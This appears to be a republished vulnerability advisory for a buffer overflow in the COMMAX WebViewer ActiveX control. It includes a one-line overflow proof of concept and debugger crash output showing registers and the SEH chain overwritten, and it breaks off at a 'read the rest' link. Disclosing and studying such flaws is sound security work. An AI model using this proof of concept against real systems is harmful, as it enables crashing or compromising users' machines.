COMMAX WebViewer ActiveX Control 2.1.4.5 Commax

COMMAX WebViewer ActiveX Control 2.1.4.5 Commax_WebViewer.ocx Buffer Overflow

Sep 1, 2021 10:00 pm Cyber Security 266

# Exploit Title: COMMAX WebViewer ActiveX Control 2.1.4.5 - 'Commax_WebViewer.ocx' Buffer Overflow # Date: 02.08.2021 # Exploit Author: LiquidWorm # Vendor Homepage: https://www.commax.com COMMAX WebViewer ActiveX Control 2.1.4.5 (Commax_WebViewer.ocx) Buffer Overflow Vendor: COMMAX Co., Ltd. Prodcut web page: https://www.commax.com Affected version: 2.1.4.5 Summary: COMMAX activex web viewer client (32bit) for COMMAX DVR/NVR. Desc: The vulnerability is caused due to a boundary error in the processing of user input, which can be exploited to cause a buffer overflow when a user inserts overly long array of string bytes through several functions. Successful exploitation could allow execution of arbitrary code on the affected node. Tested on: Microsoft Windows 10 Home (64bit) EN Microsoft Internet Explorer 20H2 Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2021-5663 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5663.php 02.08.2021 -- $ python >>> "A"*1000 [ToTheClipboard] >>>#Paste in ID or anywhere (5220.5b30): Access violation - code c0000005 (!!! second chance !!!) wow64!Wow64pNotifyDebugger+0x19918: 00007ff9`deb0b530 c644242001 mov byte ptr [rsp+20h],1 ss:00000000`0c47de00=00 0:038> g (5220.5b30): Access violation - code c0000005 (first chance) First chance exceptions are reported before any exception handling. This exception may be expected and handled. *** ERROR: Symbol file could not be found. Defaulted to export symbols for CNC_Ctrl.DLL - CNC_Ctrl!DllUnregisterServer+0xf5501: 0b4d43bf f3aa rep stos byte ptr es:[edi] 0:038:x86> r eax=00000000 ebx=00002000 ecx=0000000f edx=00000000 esi=41414141 edi=41414141 eip=0b4d43bf esp=0d78f920 ebp=0d78f930 iopl=0 nv up ei pl zr na pe nc cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010246 CNC_Ctrl!DllUnregisterServer+0xf5501: 0b4d43bf f3aa rep stos byte ptr es:[edi] 0:038:x86> !exchain 0d78fac4: CNC_Ctrl!DllUnregisterServer+eca92 (0b4cb950) 0d78fb74: ntdll_76f80000!_except_handler4+0 (76ffad20) CRT ..

Support the originator by clicking the read the rest link below.